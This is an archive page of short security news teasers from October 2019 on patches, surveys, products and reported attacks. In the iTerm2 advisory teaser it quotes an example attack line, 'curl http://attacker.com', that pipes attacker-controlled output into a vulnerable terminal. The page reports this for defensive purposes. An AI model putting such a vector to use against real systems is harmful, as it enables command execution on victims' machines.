Category Archives: Don’t miss

Microsoft debuts hardware-rooted security for foiling firmware attacks

Microsoft partnered with mainstream chip and computer makers to deliver hardware protection of firmware right out of the box: the so-called Secured-core PCs are aimed at foiling attackers who rely on exploiting firmware vulnerabilities to surreptitiously gain access to computer systems. Firmware is an attractive target Attackers are always looking for new and easier ways to compromise target systems, as well as ways to keep that compromise concealed from the system owners for as long … More

The post Microsoft debuts hardware-rooted security for foiling firmware attacks appeared first on Help Net Security.

Why organizations must arm their SOCs for the future

Security Operations Centers (SOCs) around the globe represent the first line of defense between enterprises and cyber-threats. This mission requires that SOCs respond to security alerts around the clock, and jump into action as quickly as possible to minimize the damage done from events that are in progress while keeping the uptime of critical operations in accordance to the SLAs. The importance of SOCs are highlighted by the fact that 30% of CEOs rate cyber-threats … More

The post Why organizations must arm their SOCs for the future appeared first on Help Net Security.

Perceptions on the impact of data breaches and identity protection

4iQ recently completed research focusing on Americans’ attitudes about cybersecurity breaches and the efforts that organizations make to mitigate breaches’ effects on identity theft. Where’s the data? The findings indicate that a large proportion of Americans (44%) believe their personally identifiable information (PII) has been stolen as a result of a data breach. A strong majority (63%) are concerned that prior breaches could lead to future identity fraud, and a significant number (37%) believe they … More

The post Perceptions on the impact of data breaches and identity protection appeared first on Help Net Security.

How the under 30s expect new approaches to cybersecurity

In today’s multigenerational workforce, the over-30s are more likely to adopt cybersecurity good practice than their younger colleagues who have grown up with digital technology. This is according to a report on generational attitudes to cybersecurity from the security division of NTT. The report identified good and bad practice for organizations researched as part of its Risk:Value 2019 report, scored across 17 key criteria. This revealed that under-30s score 2.3 in terms of cybersecurity best … More

The post How the under 30s expect new approaches to cybersecurity appeared first on Help Net Security.

How cybersecurity accelerates business growth

It’s no secret that the cybersecurity industry has grown exponentially over more than a decade due to the proliferation of high-profile cybercrime. Viewing cybersecurity as simply a necessary step to mitigate cyber risk leaves much opportunity on the table. Organizational leaders need to see cybersecurity as a business enabler that can accelerate growth. Companies that view cybersecurity with the myopic lens of being a necessary overhead cost to protect data are losing out on opportunities … More

The post How cybersecurity accelerates business growth appeared first on Help Net Security.

Deepfakes and voice as the next data breach

Deepfake technology, which uses deep learning to create fake or altered video and audio content, continues to pose a major threat to businesses, consumers, and society as a whole. In the lead up to the 2020 U.S. presidential election, government officials have expressed concerns about potential deepfake attacks to spread misinformation, and evidence suggests that while this technology is advancing rapidly, governments and tech companies are still ill-prepared to detect and combat it. Deepfakes caught … More

The post Deepfakes and voice as the next data breach appeared first on Help Net Security.

Webinar: Application Protection and Performance Monitoring Using Datadog + Signal Sciences

For years, security, operations, and engineering have struggled to get one cohesive view of application performance and real-time attacks due to multiple streams of data from a variety of operations and security tools that don’t work well together. We are out to change that. In this webinar, learn how Signal Sciences and Datadog have teamed up to provide powerful monitoring, visualization, and alerting—all in one place. Learn how this integration: Provides developers immediate app performance … More

The post Webinar: Application Protection and Performance Monitoring Using Datadog + Signal Sciences appeared first on Help Net Security.

Cryptojacking worm compromised over 2,000 Docker hosts

Security researchers have discovered a cryptojacking worm that propagates using containers in the Docker Engine (Community Edition) and has spread to more than 2,000 vulnerable Docker hosts. “The attacker compromised an unsecured Docker daemon, ran the malicious Docker container pulled from Docker Hub, downloaded a few scripts and a list of vulnerable hosts from C2 and repeatedly picked the next target to spread the worm,” Palo Alto Networks’s Unit 42 researchers explained. A worm named … More

The post Cryptojacking worm compromised over 2,000 Docker hosts appeared first on Help Net Security.

Six steps for implementing zero trust access

Modern organizations are no longer governed by fixed perimeters. In fact, the perimeter-based security model is disintegrating in a world where users work on their own devices from anywhere, and sensitive company data is stored in multiple cloud services. Organizations can no longer rely on binary security models that focus on letting good guys in and keeping bad guys out. Their big challenge is figuring out how to give users the access they need while … More

The post Six steps for implementing zero trust access appeared first on Help Net Security.

New infosec products of the week: October 18, 2019

Pradeo Secure Private Store facilitates and expands safe BYOD usage Pradeo launched a unique Secure Private Store solution that allows organizations to distribute mobile services to their collaborators (public and private apps, documents), that they can freely use under the condition that their device does not bear any threat. Elastic blends SIEM and endpoint security into a single solution for real-time threat response Elastic Endpoint Security is based on Elastic’s acquisition of Endgame. Now, when … More

The post New infosec products of the week: October 18, 2019 appeared first on Help Net Security.

As car manufacturers focus on connectivity, hackers begin to exploit flaws

Car manufacturers offer more software features to consumers than ever before, and increasingly popular autonomous vehicles that require integrated software introduce security vulnerabilities. Widespread cloud connectivity and wireless technologies enhance vehicle functionality, safety, and reliability but expose cars to hacking exploits. In addition, the pressure to deliver products as fast as possible puts a big strain on the security capabilities of cars, manufacturing facilities, and automotive data, a IntSights report reveals. “The automotive manufacturing industry … More

The post As car manufacturers focus on connectivity, hackers begin to exploit flaws appeared first on Help Net Security.

Review: The Great Hack

Data is the most valuable asset/resource on Earth. Still, we have little or no control over who is exploiting ours without our consent. That is what the authors, Jehane Noujaim and Karim Amer, want to make us realize in their documentary film The Great Hack, released by Netflix on July 24, 2019. Jehane Noujaim, American documentary film director, and Karim Amer, Egyptian-American film producer and director, already worked together on The Square (2013), but it … More

The post Review: The Great Hack appeared first on Help Net Security.

Researcher releases PoC rooting app that exploits recent Android zero-day

Late last month Google Project Zero researcher Maddie Stone detailed a zero-day Android privilege escalation vulnerability (CVE-2019-2215) and revealed that it is actively being exploited in attacks in the wild. She also provided PoC code that could help researchers check which Android-based devices are vulnerable and which are not. One of those has decided to go further. Achieving “root” through a malicious app “The base PoC left us with a full kernel read/write primitive, essentially … More

The post Researcher releases PoC rooting app that exploits recent Android zero-day appeared first on Help Net Security.

Cisco fixes serious flaws in enterprise-grade Catalyst and Aironet access points

Cisco has released another batch of security updates, the most critical of which fixes a vulnerability that could allow unauthenticated, remote attackers to gain access to vulnerable Cisco Aironet wireless access points. Cisco Aironet APs are enterprise-grade access points used for branch offices, campuses, organizations of all sizes, enterprise and carrier-operator Wi-Fi deployments, and so on. Cisco Aironet vulnerabilities During the resolution of a Cisco TAC support case, the company’s technicians discovered a number of … More

The post Cisco fixes serious flaws in enterprise-grade Catalyst and Aironet access points appeared first on Help Net Security.

Key challenges impacting IT audit pros navigating an evolving risk landscape

Protiviti and ISACA surveyed 2,252 chief audit executives (CAEs), internal audit professionals and IT audit vice presidents and directors worldwide. Asked to identify their biggest technology challenges, IT audit leaders and professionals noted the following as their top five: IT security and privacy/cybersecurity Data management and governance Emerging technology and infrastructure changes – transformation/innovation/disruption Staffing and skills challenges Third-party/vendor management “As much as organizations are focusing on cybersecurity and protecting their data, they’re still behind … More

The post Key challenges impacting IT audit pros navigating an evolving risk landscape appeared first on Help Net Security.

1 in 5 SMBs have fallen victim to a ransomware attack

Ransomware remains the most common cyber threat to SMBs, according to a Datto survey of more than 1,400 MSP decision makers that manage the IT systems for small-to-medium-sized businesses. SMBs are a prime target While it is used against businesses of all sizes, SMBs have become a prime target for attackers. The report uncovered a number of ransomware trends specifically impacting the SMB market: Ransomware attacks are pervasive. The number of ransomware attacks against SMBs … More

The post 1 in 5 SMBs have fallen victim to a ransomware attack appeared first on Help Net Security.

Executives are not actively engaged in ensuring the effectiveness of cybersecurity strategy

There’s a clear lack of accountability, especially on the board and among C-suite executives, and a lack of confidence in determining the efficacy of security technologies. AttackIQ and Ponemon Institute surveyed 577 IT and IT security practitioners in the United States who are knowledgeable about their organizations’ IT security strategy, tactics, and technology investments. “Enterprise culture is formed at the top. If enterprise leaders are not actively engaged in ensuring a strong cybersecurity posture, it … More

The post Executives are not actively engaged in ensuring the effectiveness of cybersecurity strategy appeared first on Help Net Security.

WAV files spotted delivering malicious code

Attackers have embedded crypto-mining and Metasploit code into WAV audio files to stymie threat detection solutions. “All WAV files discovered adhere to the format of a legitimate WAV file (i.e., they are all playable by a standard audio player),” Josh Lemos, VP of Research and Intelligence at BlackBerry Cylance, told Help Net Security. “One WAV file contained music with no indication of distortion or corruption and the others contained white noise. One of the WAV … More

The post WAV files spotted delivering malicious code appeared first on Help Net Security.

Adobe splats bucketful of bugs in Acrobat and Reader

If you thought that Adobe skipped this month’s Patch Tuesday because there were no immediate vulnerabilities to fix, you were wrong: a week later the company dropped security updates for several of its products, including Acrobat and Reader and the Download Manager. All in all, 82 security holes – most of which are critical – have been plugged. The good news is that none are under active exploitation. The updates The update for Adobe Acrobat … More

The post Adobe splats bucketful of bugs in Acrobat and Reader appeared first on Help Net Security.

Code dependency mapping’s role in securing enterprise software

Enterprise software is only as good as its security. Today, a data breach costs $3.92 million on average. Organizations are expected to spend $124 billion on security in 2019 and will probably invest even more given the alarming rate at which cyberattacks are growing. Despite these investments, newer and more sophisticated threats are emerging every day, making the security of an enterprise’s software environment challenging – even for the most well-prepared. Fortunately, new innovations have … More

The post Code dependency mapping’s role in securing enterprise software appeared first on Help Net Security.

Microsegmentation for refining safety systems

When the TRITON (aka TRISIS) attack struck three refining sites in the Middle East in November of 2017, it was the first known cyber incident to target safety instrumented systems (SIS), specifically Schneider Electric’s Triconex gear. The consequences of these attacks were plant-wide shutdowns. While such shutdowns are costly, the consequences could have been far worse. Refineries rely on correctly functioning SIS equipment to prevent worker casualties and environmental disasters in the face of both … More

The post Microsegmentation for refining safety systems appeared first on Help Net Security.

Fake mobile app fraud tripled in first half of 2019

In Q2 2019, RSA Security identified 57,406 total fraud attacks worldwide. Of these, phishing attacks were the most prevalent (37%), followed by fake mobile apps (usually apps posing as those of popular brands). But while phishing went up by just 6 percent when the numbers from 1H 2019 are compared to those from 2H 2018, attacks via financial malware and rogue mobile apps have increased significantly (80 and 191 percent, respectively). “The fact that fraud … More

The post Fake mobile app fraud tripled in first half of 2019 appeared first on Help Net Security.

When properly managed, shadow IT can benefit your organization

77 percent of IT professionals believe their organizations could earn an edge if company leaders were more collaborative with their businesses to find shadow IT solutions, according to a survey of 1000 US-based IT professionals by Entrust Datacard. As organizations adapt to changing technologies, employees are eager to use productivity solutions that help them function more efficiently — even if these solutions are outside the company’s IT rules and processes. This is the shadow IT … More

The post When properly managed, shadow IT can benefit your organization appeared first on Help Net Security.

Download: IR Reporting for Management PPT template

Many security pros that are doing an excellent job in handling incidents find that effectively communicating the process to their management is a challenging task. Cynet addresses this gap with the IR Reporting for Management PPT template, providing an intuitive tool to report both the ongoing IR process and its conclusion. The IR for Management template enables CISOs and CIOs to communicate the key points that management cares about: assurance that the incident is under … More

The post Download: IR Reporting for Management PPT template appeared first on Help Net Security.

Tamper Protection prevents malware from disabling Microsoft Defender AV

Microsoft Defender, the anti-malware component of Microsoft Windows, has been equipped with a new protective feature called Tamper Protection, which should prevent malware from disabling it. The feature will be rolled out to Windows 10 users and enabled by default for home users. Enterprise administrators will be able to enable it for endpoints via Intune (the Microsoft 365 Device Management portal). About Tamper Protection “Tamper protection prevents unwanted changes to security settings on devices. With … More

The post Tamper Protection prevents malware from disabling Microsoft Defender AV appeared first on Help Net Security.

“Smart city” governments should also be smart about security

While the definition of “smart city” is still under debate, one thing is indisputable: the technologies used to make smart cities a reality are currently acquired and deployed after very little (or even no) security testing. Cesar Cerrudo, CTO at IOActive and board member of the Securing Smart Cities initiative, says that city governments – the buyers of these technologies – often blindly trust vendors when they say that their products are secure. They ask … More

The post “Smart city” governments should also be smart about security appeared first on Help Net Security.

Viewing cybersecurity incidents as normal accidents

As we continue on through National Cybersecurity Awareness Month (NCSAM), a time to focus on how cybersecurity is a shared responsibility that affects all Americans, one of the themes that I’ve been pondering is that of personal accountability. Years ago, I read Charles Perrow’s book, “Normal Accidents: Living with High-Risk Technologies,” which analyzes the social side of technological risk. When the book was first written in 1984, Perrow analyzed complex systems like nuclear power, aviation … More

The post Viewing cybersecurity incidents as normal accidents appeared first on Help Net Security.

Product showcase: Alsid for AD

You are using Active Directory (AD) every day, every hour, every minute when you log into your device, open your emails, access an application, or share a file. But, guess what, it’s also used by hackers on a daily basis. Simply put, when attackers take control of your AD, they inherit godlike powers over your IT. Sweet. Analyzing attack vectors: How attack pathways are born Active Directory itself is a robust product that suffered few … More

The post Product showcase: Alsid for AD appeared first on Help Net Security.

AI development has major security, privacy and ethical blind spots

Security, privacy and ethics are low-priority issues for developers when modeling their machine learning solutions, according to O’Reilly. Major issues Security is the most serious blind spot. Nearly three-quarters (73 per cent) of respondents indicated they don’t check for security vulnerabilities during model building. More than half (59 per cent) of organizations also don’t consider fairness, bias or ethical issues during ML development. Privacy is similarly neglected, with only 35 per cent checking for issues … More

The post AI development has major security, privacy and ethical blind spots appeared first on Help Net Security.

Free SOAR Platforms eBook

A SOAR platform represents an evolution in security operations driven by the vast amounts of data that must be processed. Working off a single platform is critical to successful coordination of detection and response initiatives, as it keeps knowledge sharing across these teams fluid and instantaneous. Security orchestration and automation integrates different technologies and allows you to conduct defensive actions: it increases your effectiveness in stopping, containing, and preventing attacks. The great thing about SOAR … More

The post Free SOAR Platforms eBook appeared first on Help Net Security.

Analysis reveals the most common causes behind mis-issued SSL/TLS certificates

We should be able to trust public key certificates, but this is the real world: mistakes and “mistakes” happen. Researchers from Indiana University Bloomington have analyzed 379 reported instances of failures in certificate issuance to pinpoint the most common causes as well as systemic issues that contribute to these happening. About public key certificates A public key certificate (aka digital certificate) proves that an individual, entity or a device is the rightful owner and user … More

The post Analysis reveals the most common causes behind mis-issued SSL/TLS certificates appeared first on Help Net Security.

5 things security executives need to know about insider threat

Insider threat is, unfortunately, an issue that has not yet received sufficient priority. According to the 2018 Deloitte-NASCIO Cybersecurity Study, CISOs’ top challenges remain “budget, talent and increasing cyber threats,” and to some, insider threat doesn’t even make the list of top-ten priorities. Considering what’s at stake – and our 21st-century ability to see signs of, and ultimately prevent, insider threat – this is a phenomenon security executives can no longer afford to ignore. Specifically, … More

The post 5 things security executives need to know about insider threat appeared first on Help Net Security.

New data analysis approach could strengthen the security of IoT devices

A multi-pronged data analysis approach that can strengthen the security of IoT devices, such as smart TVs, home video cameras and baby monitors, against current risks and threats has been created by a team of Penn State World Campus students. Explosion of IoT devices A new forecast from IDC estimates that there will be 41.6 billion connected IoT devices, or “things,” generating 79.4 zettabytes (ZB) of data in 2025. “These devices can leave people vulnerable … More

The post New data analysis approach could strengthen the security of IoT devices appeared first on Help Net Security.

Webinar: Securing Web Layer Assets with Cloud WAF

Developers and operations teams are under constant pressure to release new features and capabilities that keep their organizations ahead of competitors. But when “Innovate!” is a constant rallying cry and velocity the measure of a development team’s worth, what happens to security at the application layer? There’s a solution: instrument and observe web requests using a Cloud Web Application Firewall (WAF) that provides detection and blocking to protect web layer assets without installing additional software. … More

The post Webinar: Securing Web Layer Assets with Cloud WAF appeared first on Help Net Security.

Imperva explains how their recent security incident happened

In late August, Imperva suffered a security incident, resulting in the compromise of sensitive information of some of their Cloud WAF (formerly Incapsula) customers. On Thursday, Imperva CTO Kunal Anand finally explained how it all happened. What happened? The first indication that something went wrong was when, on August 20, 2019, the company received a data set from an unnamed third-party requesting a bug bounty. The notification triggered an investigation and they discovery that, in … More

The post Imperva explains how their recent security incident happened appeared first on Help Net Security.

DevSecOps role expansion has changed how companies address their security posture

While organizations shift their applications to microservices environments, the responsibility for securing these environments shifts as well, Radware reveals. The rapid expansion of the Development Security Operations (DevSecOps) role has changed how companies address their security posture with approximately 70% of survey respondents stating that the CISO was not the top influencer in deciding on security software policy, tools and or implementation. This shift has likely exposed companies to a broader range of security risks … More

The post DevSecOps role expansion has changed how companies address their security posture appeared first on Help Net Security.

New infosec products of the week: October 11, 2019

FireEye Digital Threat Monitoring: Visibility beyond your walls FireEye Digital Threat Monitoring automatically collects and analyzes content on the dark and open web, alerting defenders whenever a potential threat is detected. By exposing threats early, organizations can more effectively identify breaches, exposures, and digital threats before they escalate – without adding operational complexity for the current security team. FileCloud launches Smart DLP, a real-time data leak prevention solution FileCloud Smart DLP is an intelligent, rule-driven … More

The post New infosec products of the week: October 11, 2019 appeared first on Help Net Security.

New method validates the integrity of computer chips using x-rays

Guaranteeing that computer chips, that can consist of billions of interconnected transistors, are manufactured without defects is a challenge. But how to determine if a chip is compromised? Now a technique co-developed by researchers at the Paul Scherer Institut in Switzerland and researchers at the USC Viterbi School of Engineering would allow companies and other organizations to non-destructively scan chips to ensure that they haven’t been altered and that they are manufactured to design specifications … More

The post New method validates the integrity of computer chips using x-rays appeared first on Help Net Security.

Microsoft NTLM vulnerabilities could lead to full domain compromise

Preempt researchers have discovered two vulnerabilities that may allow attackers to bypass a number of protections and mitigations against NTLM relay attacks and, in some cases, to achieve full domain compromise of a network. What is NTLM? NT LAN Manager (NTLM) is an authentication protocol developed by Microsoft, used to authenticate a client to resources on an Active Directory domain. “Interactive NTLM authentication over a network typically involves two systems: a client system, where the … More

The post Microsoft NTLM vulnerabilities could lead to full domain compromise appeared first on Help Net Security.

2FA, HTTPS and private browsing still a mystery to most Americans

Most US adults know what phishing scams are and where they occur, what browser cookies do, and that advertising is the largest source of revenue for most social media platforms, a recent Pew Research Center survey aimed at testing American’s digital knowledge has revealed. But, sadly, it has also shown that most respondents don’t know what https:// means, what the private browsing option does, that WhatsApp and Instagram are owned by Facebook, and can’t identify … More

The post 2FA, HTTPS and private browsing still a mystery to most Americans appeared first on Help Net Security.

Critical command execution vulnerability in iTerm2 patched, upgrade ASAP!

A critical vulnerability (CVE-2019-9535) in iTerm2, a macOS terminal emulator frequently used by developers and system administrators, could allow attackers to take control of a target system. “An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer,” Mozilla explained. “Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will … More

The post Critical command execution vulnerability in iTerm2 patched, upgrade ASAP! appeared first on Help Net Security.

Build or buy: What to consider when deploying on-premise or cloud-based PKI

Public Key Infrastructure (PKI), once considered an IT table stake, has transformed from a tool used to protect websites to a core digital identity management function within the cybersecurity framework. Today’s PKI establishes and manages digital identities across people, applications and devices within the enterprise. IT teams are deploying PKI to combat several growing cybersecurity threats too, from ransomware and phishing attacks to IoT device hijacking. PKI remains a core component within the larger IT … More

The post Build or buy: What to consider when deploying on-premise or cloud-based PKI appeared first on Help Net Security.

Only 32% of organizations employ a security-first approach to cloud data storage

Although nearly half (48%) of corporate data is stored in the cloud, only a third (32%) of organizations admit they employ a security-first approach to data storage in the cloud, according to a global study from Thales, with research from the Ponemon Institute. Surveying over 3,000 IT and IT security practitioners in Australia, Brazil, France, Germany, India Japan, the United Kingdom and the United States, the research found that only one in three (31%) organizations … More

The post Only 32% of organizations employ a security-first approach to cloud data storage appeared first on Help Net Security.

Does poor password hygiene still hamper your ability to achieve high security standards?

While more businesses are investing in security measures like multifactor authentication (MFA), employees still have poor password habits that weaken companies’ overall security posture, according to LastPass. Given that stolen and reused credentials are linked to 80 percent of hacking-related breaches, businesses must take more action to improve password and access security to make a big impact on risk reduction. “Securing employee access has never been more important and unfortunately, we see businesses ignore password … More

The post Does poor password hygiene still hamper your ability to achieve high security standards? appeared first on Help Net Security.

Free eBook: Threat intelligence platforms

Today’s threat environment is complex and dynamic. The internet was built for connectivity, not security, and approaches such as intrusion detection systems, anti-virus programs, and traditional incident response methodologies by themselves are no longer sufficient in the face of the widening gap between offensive and defensive capabilities. Organizations today face Advanced Persistent Threats (APTs) and organized, criminally motivated attacks launched by adversaries with the tools, training, and resources to breach most conventional network defense systems. … More

The post Free eBook: Threat intelligence platforms appeared first on Help Net Security.

October 2019 Patch Tuesday: A small batch of updates from Microsoft, none from Adobe

As predicted by Ivanti’s Chris Goettl, October 2019 Patch Tuesday came with a relatively small number of Microsoft updates and, curiously enough, with no security updates from Adobe. There is no report of any of the Microsoft bugs being exploited, but there is public PoC code for and info about a local privilege escalation flaw in Windows Error Reporting (CVE-2019-1315). Microsoft’s patches Microsoft has addressed nearly 60 vulnerabilities, nine of which are critical. Seven of … More

The post October 2019 Patch Tuesday: A small batch of updates from Microsoft, none from Adobe appeared first on Help Net Security.

Winning the security fight: Tips for organizations and CISOs

For large organizations looking to build a robust cybersecurity strategy, failure to get the fundamentals in place practically guarantees a disaster. If you ask Matthew Rosenquist, a former Cybersecurity Strategist for Intel (now independent), overcoming denial of risk, employing the right cybersecurity leader, and defining clear goals are the three most critical objectives for avoiding a negative outcome. Getting things right “Every organization, large and small, begins with a belief they are not at significant … More

The post Winning the security fight: Tips for organizations and CISOs appeared first on Help Net Security.

Digital transformation requires an aggressive approach to security

Organizations agree, building security into digital transformation initiatives is a priority, yet the recommended path to progress is unclear, according to a survey conducted by ZeroNorth. Companies of all sizes and in all industries are experiencing the pains of digital transformation, with 79% of survey respondents indicating their organization already has related initiatives underway. All participants indicate the importance of digital transformation to the future of their organization, even those who have not yet embarked … More

The post Digital transformation requires an aggressive approach to security appeared first on Help Net Security.

Phishing attempts increase 400%, many malicious URLs found on trusted domains

1 in 50 URLs are malicious, nearly one-third of phishing sites use HTTPS and Windows 7 exploits have grown 75% since January. A new Webroot report also highlights the importance of user education, as phishing lures have become more personalized as hackers use stolen data for more than just account takeover. Hackers are using trusted domains and HTTPS to trick victims Nearly a quarter (24%) of malicious URLs were found to be hosted on trusted … More

The post Phishing attempts increase 400%, many malicious URLs found on trusted domains appeared first on Help Net Security.

macOS Catalina: Security and privacy improvements

Apple has released macOS Catalina (v10.15), a new major release of its desktop operating system, which comes with many functional and security and privacy improvements. The former include a new game subscription service, a feature that extends Mac desktops with iPad as a second display, a new accessibility feature that makes it possible to control Mac entirely by voice, and more. The latter include, among other things, better protections against macOS tampering, an improved Gatekeeper, … More

The post macOS Catalina: Security and privacy improvements appeared first on Help Net Security.

Unmask cybercriminals through identity attribution

Organized crime has grown more complex since the turn of the century—coinciding with the rise of the digital world, cybercriminals have leveraged the proliferation of technology to broaden their reach with a more sophisticated network-structured model, effectively globalizing their operations in cyberspace and ultimately allowing cybercriminals to devastate companies and consumers alike. The faster you act, the quicker you will be able to disrupt the adversary and prevent future attacks, directly yielding greater financial savings … More

The post Unmask cybercriminals through identity attribution appeared first on Help Net Security.

Product showcase: Awake Security Network Traffic Analysis Platform

Security experts profess that enterprise organizations must assume their network is already compromised. Cyber-attacks use network communications for malware distribution, command and control, and data exfiltration. With the right tools, security professionals should be able to uncover malicious activity and take prompt action to mitigate it. Network traffic analysis (NTA) tools were designed to help security personnel to detect attackers that had managed to evade traditional defenses, especially those that are already inside the perimeter. … More

The post Product showcase: Awake Security Network Traffic Analysis Platform appeared first on Help Net Security.

Organizations need tools that support DevOps security

Organizational silos create unnecessary security risk for global businesses. The lack of security involvement in DevOps projects was reportedly creating cyber risk for 72% of IT leaders, according to Trend Micro. In an effort to better understand the DevOps culture, Trend Micro commissioned Vanson Bourne to poll 1,310 IT decision makers in SMB and enterprise organizations across the globe about their organizational culture. “It’s no secret that developers and security teams have a history of … More

The post Organizations need tools that support DevOps security appeared first on Help Net Security.

Report: 2019 eSentire Threat Intelligence Spotlight

This new report, Threat Intelligence Spotlight: The Shifting Framework of Modern Malware, draws on data gathered from the 650-plus organizations that eSentire protects and Carbon Black’s extensive endpoint protection install base. Key insights of the report include: An approximate median of 10 variants within a malware family, which begins to highlight the challenges faced by traditional endpoint solutions The largest number of variants within a malware family is more than 200 It takes nearly 40 … More

The post Report: 2019 eSentire Threat Intelligence Spotlight appeared first on Help Net Security.

Cisco closes high-impact vulnerabilities in its security offerings

Cisco has fixed 18 high-impact vulnerabilities affecting several of its security offerings and is advising administrators to test and implement the offered security updates as soon as possible. “Successful exploitation of the vulnerabilities could allow an attacker to gain unauthorized access, gain elevated privileges, execute arbitrary commands, or cause a denial of service (DoS) condition on an affected device,” the company said. About the vulnerabilities The vulnerabilities affect Cisco ASA (Adaptive Security Appliance) Software, Cisco … More

The post Cisco closes high-impact vulnerabilities in its security offerings appeared first on Help Net Security.

Cloud-native applications need a unified continuous security approach

Cloud-native has arrived and now, it’s taking over. By 2021, 92% of companies will go cloud-native. It’s faster, it’s more efficient, more scalable, and more flexible. But is it more secure? As businesses integrate cloud-native technologies, such as Kubernetes, across their clouds, the complexity and distributed nature of these platforms increasingly require companies to rethink their approach not only to Dev and Ops, but also, security. The primary cloud platforms – AWS, Azure and Google … More

The post Cloud-native applications need a unified continuous security approach appeared first on Help Net Security.

Insider threats are security’s new reality: Prevention solutions aren’t working

Insider threats expose companies to breaches and put corporate data at risk. New research from Code42 questions whether the right data security solutions are being funded and deployed to stop insider threats and asserts that legacy data loss prevention solutions fall short in getting the job done. Today, 79% of information security leaders believe that employees are an effective frontline of defense against data breaches. However, this year’s report disputes that notion. Wake-up call: Insider … More

The post Insider threats are security’s new reality: Prevention solutions aren’t working appeared first on Help Net Security.

Whitepaper: Identifying Web Attack Indicators

Attackers are always looking for ways into web and mobile applications. The 2019 Verizon Data Breach Investigation Report listed web applications the number ONE vector attackers use when breaching organizations. In this paper, Signal Sciences examine malicious web request patterns for four of the most common web attack methods and show how to gain the context and visibility that is key to stopping these attacks. Key learnings: Four common web layer attack types: account takeover, … More

The post Whitepaper: Identifying Web Attack Indicators appeared first on Help Net Security.

Unpatched Android flaw exploited by attackers, impacts Pixel, Samsung, Xiaomi devices

A privilege escalation vulnerability affecting phones running Android 8.x and later is being leveraged by attackers in the wild, Google has revealed. Interestingly enough, the flaw was patched in late 2017 in v4.14 of the Linux kernel and in Android versions 3.18, 4.4, and 4.9, but the fix was apparently never propagated to later Android versions. Who’s affected? Maddie Stone, a Senior Security Engineer on the Android Security team at Google, revealed that a number … More

The post Unpatched Android flaw exploited by attackers, impacts Pixel, Samsung, Xiaomi devices appeared first on Help Net Security.

October 2019 Patch Tuesday forecast: Be sure to apply service stack updates

School is back in session across most of the world, and here in the United States most students look forward to a school holiday called ‘fall break.’ While we never have a Patch Tuesday off, this may actually be a bit of fall break for most us because I don’t anticipate many updates this month. Before we get into the forecast details, I’d like to provide some information around service stack updates (SSUs) and how … More

The post October 2019 Patch Tuesday forecast: Be sure to apply service stack updates appeared first on Help Net Security.

New infosec products of the week: October 4, 2019

Anomali Altitude automates detection, analysis, and threat response The Anomali Altitude platform delivers Anomali Lens, Anomali ThreatStream, and Anomali Match. The integrated product suite allows customers to automate detection, analysis, and response for high-priority external and internal threats. Anomali Lens allows anyone, from security operations staff to board members, to automatically and immediately know if their organizations are being attacked, who adversaries are, and if the attacks have been successful. Titus Accelerator for Privacy reduces … More

The post New infosec products of the week: October 4, 2019 appeared first on Help Net Security.

Enterprises leaving themselves vulnerable to cyberattacks by failing to prioritize PKI security

IoT is one of the fastest growing trends in technology today, yet enterprises are leaving themselves vulnerable to dangerous cyberattacks by failing to prioritize PKI security, according to new research from nCipher Security. The 2019 Global PKI and IoT Trends Study, conducted by research firm the Ponemon Institute and sponsored by nCipher Security, is based on feedback from more than 1,800 IT security practitioners in 14 countries/regions. The study found that IoT is the fastest-growing … More

The post Enterprises leaving themselves vulnerable to cyberattacks by failing to prioritize PKI security appeared first on Help Net Security.

Microsoft will continue providing Windows 7 security updates for SMBs

According to the latest Alert Logic’s research, most devices in small and midsize businesses (SMBs) run Windows versions that are expired or are about to expire soon. Luckily for SMBs that don’t want or can’t upgrade from Windows 7, Microsoft has decided to provide extended security updates (ESU) through January 2023 – if they are willing to pay for them, of course. Details about the ESU offer Windows is the most popular desktop operating system … More

The post Microsoft will continue providing Windows 7 security updates for SMBs appeared first on Help Net Security.

Good cybersecurity comes from focusing on the right things, but what are they?

“There is no wrong way into the security field and it’s never too late to make a career switch that will take you there,” says Mark Orlando, CTO at Raytheon Cyber Protection Solutions. If you think that’s easy for him to say, consider his education and employment twists and turns before getting into technology and, ultimately, into cybersecurity: he was an art and design student, then a Marine, and later an UPS truck loader. While … More

The post Good cybersecurity comes from focusing on the right things, but what are they? appeared first on Help Net Security.

How security programs and breach history influence company valuations

96% of cybersecurity professionals indicated that cybersecurity readiness factors into the calculation when they are assessing the overall monetary value of a potential acquisition target, a (ISC)2 survey reveals. (ISC)2 surveyed 250 U.S.-based professionals with mergers and acquisitions (M&A) expertise. Survey respondents unanimously agreed that cybersecurity audits are not only commonplace but are actually standard practice during M&A transaction preparation. The research also found that the results of such due diligence can have a tangible … More

The post How security programs and breach history influence company valuations appeared first on Help Net Security.

PDFex attacks can exfiltrate content from encrypted PDF documents

Researchers from Ruhr University Bochum and Münster University of Applied Sciences have devised new attacks allowing them (and potential attackers) to recover the plaintext content of encrypted PDF documents. The attacks work against 27 widely-used desktop and browser-integrated PDF viewers. The attacks The PDFex attacks (as the researchers collectively dubbed them) can either result in direct exfiltration or exfiltration via CBC gadgets. Direct exfiltration attacks abuse the fact that some PDF readers don’t encrypt the … More

The post PDFex attacks can exfiltrate content from encrypted PDF documents appeared first on Help Net Security.

Urgent11 flaws affect more medical, industrial devices than previously thought

When, in late July, Armis researchers revealed the existence of the so-called Urgent11 vulnerabilities in Wind River’s VxWorks real-time operating system, they noted that RTOS offerings by other vendors may also be vulnerable. As it turns out, they were right – they are also present is some versions of these Real Time Operating Systems: OSE by ENEA INTEGRITY by Green Hills Nucleus RTOS by Mentor ITRON by TRON Forum ZebOS by IP Infusion. (The researchers … More

The post Urgent11 flaws affect more medical, industrial devices than previously thought appeared first on Help Net Security.

The 5 biggest examples of executive threats and how to prevent them

Many executives focus their security efforts and budgets solely on physical threats, but attacks targeting an executive’s digital presence can be just as dangerous. Criminals are looking to exploit the wealth of high-profile and high net-worth individuals—or cause them embarrassment or personal harm—at an unprecedented rate. And, as the most abundant source of company secrets and IP, they’re a primary attack vector of their businesses too. Attacks on VIPs involve attempts at accessing their sensitive … More

The post The 5 biggest examples of executive threats and how to prevent them appeared first on Help Net Security.

49% of infosec pros are awake at night worrying about their organization’s cybersecurity

Six in every ten businesses have experienced a breach in either in the last three years. At least a third of infosec professionals (36%) whose employers had not recently been a victim of a cyber attack also believe that it is likely that they are currently facing one without knowing about it. This may be an indicator of a bumper year for breaches, as the total number of organizations reporting breaches in 2018 only came … More

